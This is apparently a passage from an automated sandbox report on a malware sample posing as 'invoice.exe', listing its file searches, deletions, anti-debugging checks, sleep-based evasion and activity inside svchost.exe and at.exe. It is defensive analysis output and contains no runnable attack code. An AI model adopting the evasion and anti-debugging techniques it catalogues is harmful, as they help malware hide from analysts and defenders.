            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\at.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\at.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FE449B
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FEC7E8
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEC75D FindFirstFileW,FindClose,0_2_00FEC75D
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF021
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FEF17E
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEF47F
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3833
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00FE3B56
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FEBD48
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F84AFE
            Source: at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: usnnduqerdgHbr.exe, 00000007.00000002.3576006370.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: firefox.exe, 00000008.00000002.2263017191.00000134D049C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417703 LdrLoadDll,1_2_00417703
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF401F BlockInput,0_2_00FF401F
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83B4C
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FB5BFC
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FFC104 LoadLibraryA,GetProcAddress,0_2_00FFC104
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0152D468 mov eax, dword ptr fs:[00000030h]0_2_0152D468
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0152EA78 mov eax, dword ptr fs:[00000030h]0_2_0152EA78
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0152EAD8 mov eax, dword ptr fs:[00000030h]0_2_0152EAD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov ecx, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h]1_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h]1_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039663FF mov eax, dword ptr fs:[00000030h]1_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h]1_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h]1_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h]1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h]1_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D437C mov eax, dword ptr fs:[00000030h]1_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]1_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]1_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]1_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
